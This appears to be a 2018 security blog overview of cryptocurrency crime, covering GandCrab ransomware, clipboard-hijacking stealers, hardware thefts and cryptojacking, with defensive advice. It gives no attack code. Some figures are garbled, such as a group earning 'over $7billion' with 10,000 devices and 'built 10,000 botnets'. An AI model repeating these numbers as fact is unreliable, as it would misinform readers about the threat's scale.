Crypto rush: the criminal appeal of cryptocurrency

Crypto rush: the criminal appeal of cryptocurrency

Treasure is no longer only gold or cash, but history seems to repeat itself  as the value of cryptocoins remains extremely attractive.

The past week has been another illustration of how appealing crypto coins are also to criminals. Thus, it is no longer surprising that most ransomware demand payments in cryptocurrencies. New attack processes like cryptojacking, have been introduced over the past few months- making cryptocurrencies even more vulnerable in terms of cybersecurity. Today, we are gathering insights on the latest cryptocurrency risks and criminal trends.

Ransom and theft strategies: classic processes applied to the crypto-world

GrandCrab: “One of the most aggressive ransomware of 2018”

Ransomware is currently one of the most prominent cyber threats and Grandcrab has set the bar high for 2018. This malware is a file-encrypting program which, after a few social engineering tricks will lock one’s files. According to Europol, it is already one of the most aggressive forms of ransomware of the year as it has already made more than 50,000 victims, asking a ransom payment of USD 300-500 in Dash cryptocurrency. This week, a new decryption tool was released by the Romanian police in collaboration with Europol and Bitdefender. It is free and available on and should eventually limit the financial gain of the criminals behind it.

Crypto Theft: from malware to simple real-life tricks

Asking cryptocurrency as a ransom or illegally using devices to mine them are two currently popular processes which do not imply to directly steal them from others. Of course, it is also a thing as the following cases will show.


  • Crypto stealer malware

Early this year, a trojan cryptocoin stealer was discovered, called Evrial The malware replaces legitimate addresses and URLs with addresses linked to the attackers, who may have bought access to the platform as a service. It silently changes the addresses in the Windows Clipboard. According to ElevenPaths 0.122 BTC and 0.0131 Litecoins. The platform is also available as a service on a Russian Criminal forum for 1,500 Rubles.

Last week, PaloAlto Network discovered a new crypto stealing malware named ComboJack. The malware operates through a similar process than Evrial, stealing crypto coins and regular money by changing the recipient addresses before the consumer finalizes its payment. Victims’ devices get infected through a phishing campaign, containing a PDF with information of a lost passport.


  • Physical cybersecurity

The co-founder of Apple, Steve Wozniak, has also been recently ‘robbed‘ as he intended to sell 7 Bitcoins. The buyer used a stolen credit card number which led to a canceled transaction, as the token had already been received. This is another case of physical cyberthreat where the physical and cyber worlds collide. It is one of the five most prominent threats in 2018 according to CBR online.

In December and January, a so-called “Big Bitcoin Heist” got 600 Icelandic servers stolen, making hardware kidnapping officially a cryptocoin burglary technique. The theft is estimated at $2million.


Ransomware and crypto theft can both be very profitable but limited in time as awareness raises, decryption tools are deployed and investigations proceeds. It has led criminals to think new ways to get more cryptocoins. Research from both Cisco and Kapersky labs showed crypto jacking is being favored by attackers over ransomware attacks to get cryptocurrencies. Indeed, this type of attacks requires little effort to infect a computer with fewer chances to be detected, making it a very lucrative business.


Cryptojacking: the new malicious trend

Cryptojacking consists of intruders infecting private computers to execute crypto mining activities. The trend seems to have started back in September 2017 with the introduction of Coinhive Javascript enabling Monero mining directly from a browser. According to Kapersky Labs, the most successful group made over $7billion in only six months, using about 10,000 devices. This process puts any end-user at risk, using both consumers and corporates networks.

So how do computers get infected?

  • Malvertising

One famous example implies Youtube, as the ads were used as ground zero to spread the malware.


  • Cracked Games 
  • Pirated software


In late February, researchers at Trend Micro have discovered a new campaign exploiting CVE-2017-10271, a patched Oracle Weblogic WLS-WSAT vulnerability that allows for remote code execution. The campaign delivers two Monero miners at once, a 64-bit and 32-bit variant. The miners operate automatically.

Earlier this year, another vulnerability found on WebLogic/PeopleSoft servers was exploited and the hack is said to have brought attackers $226,000 worth of cryptocoins.

In most cases, the mining is likely to remain unknown as little consequences can be experienced. Mining only costs a lot of power and may eventually slow down devices. However, Tesla recently had to deal with proprietary data leak as one of its cloud accounts was hacked in order to mine cryptocurrencies. Security researchers found out the servers was running Kubernetes used for mining, thanks to well-hidden cryptojacking campaign.

Some malware scanners are starting to detect mining malware. According to our experts though, the best way to remain protected is to patch, update systems and software regularly and above all, to raise cyber awareness as most processes start with phishing tricks.

Who is behind it?

The report made by Kapersky Lab profiles three groups of mining criminals:

Group 1

  • Built 10,000 botnets from consumers to corporate PCs.
  • Mining Monero
  • Prerequisite: unpatched vulnerabilities
  • Further processes: process hollowing and Microsoft Windows Task Scheduler manipulation

Group 2

  • Specific targets
  • Prior access to the Network
  • Hard coded information on the Power Shell script.
  • Private Monero mining pool

Group 3

  • Sells but does not use it
  • Customizable kits inspired by kits advertised on the Dark Web
  • Less advanced actors can now cryptojack.



Cryptocurrency is currently a valuable asset hitting the trends in cyber-attacks and as the value increases, concerns should as well. Thefts can operate via physical cybersecurity strategies and use real-life tactics, making crypto theft ridiculously easy to achieve. Furthermore, cryptojacking has been a major rising trend over the past few weeks, as it secretly and illegally uses people or organization’s devices to mine crypto coins with in some cases, damaging consequences such as data leaks. Eventually, the existence of cryptojacking-as-a-service platforms proves that the demand for such tools from financially-motivated criminals is not about to fade, rising crypto security as a major security concern for the near future.


Back to overview